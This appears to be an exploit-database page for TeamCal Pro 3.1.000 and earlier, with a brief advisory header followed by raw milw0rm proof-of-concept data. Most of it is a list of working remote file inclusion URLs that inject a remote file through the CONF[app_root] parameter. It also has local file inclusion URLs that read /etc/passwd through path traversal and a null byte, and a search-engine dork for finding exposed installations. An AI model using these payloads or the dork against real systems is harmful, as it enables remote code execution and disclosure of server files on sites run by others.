header-logo
Suggest Exploit
vendor:
TeamCal Pro
by:
7.5
CVSS
HIGH
RFI / LFI
CWE
Product Name: TeamCal Pro
Affected Version From: TeamCal Pro <= 3.1.000
Affected Version To: TeamCal Pro <= 3.1.000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

TeamCal Pro <= 3.1.000 Multiple RFI / LFI Vulnerabilities

Multiple Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerabilities exist in TeamCal Pro version 3.1.000 and earlier. These vulnerabilities allow an attacker to include arbitrary remote or local files, potentially leading to remote code execution or information disclosure.

Mitigation:

Upgrade to a patched version of TeamCal Pro.
Source

Exploit-DB raw data:

  ##############             ######  ######                  ########           ########                ######  ######
  ##    ##    ##               ##      ##                  ##      ##          ##      ##                 ####  ####  
        ##       ####  ######    ##  ##      ########    ##                  ##             ########      ####  ####  
        ##         ####          ##  ##    ##        ##  ##                  ##           ##        ##    ##  ##  ##  
        ##         ##              ##        ##########  ##      ######      ##           ##        ##    ##  ##  ##  
        ##         ##              ##      ##        ##  ##        ##        ##           ##        ##    ##      ##  
        ##         ##              ##      ##        ##    ##      ##   ####   ##      ## ##        ##    ##      ##  
      ######     ##########      ######      ##########      ######     ####     ######     ########    ######  ######



                   TeamCal Pro <= 3.1.000 Multiple RFI / LFI Vulnerabilities
                   Script: http://www.lewe.com/index.php?option=com_docman&task=cat_view&gid=112&Itemid=27
                   POC :
                   http://localhost/ScriptPage/includes/tcuser.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/absencecount.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/avatar.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/csvhandler.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/functions.tcpro.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/header.html.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/joomlajack.tcpro.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/menu.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/other.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcabsence.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcabsencegroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcallowance.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcannouncement.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcconfig.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcdaynote.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcgroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tclogin.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcmonth.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tctemplate.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcuser.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcusergroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcuseroption.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage//index.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage//register.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage/login.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage/statistics.php?lang=../../../../../../../../etc/passwd%00                   
                   
                   Dork : http://www.google.com.sa/search?q=Powered+by+TeamCal+Pro&ie=utf-8&oe=utf-8&rls=org.mozilla:ar:official&client=firefox-a
                   SP.Thanx To : Tryag.Com/cc [Tryag-Team]

# milw0rm.com [2007-12-25]

Navigation

Suggest Exploit

Services By CQR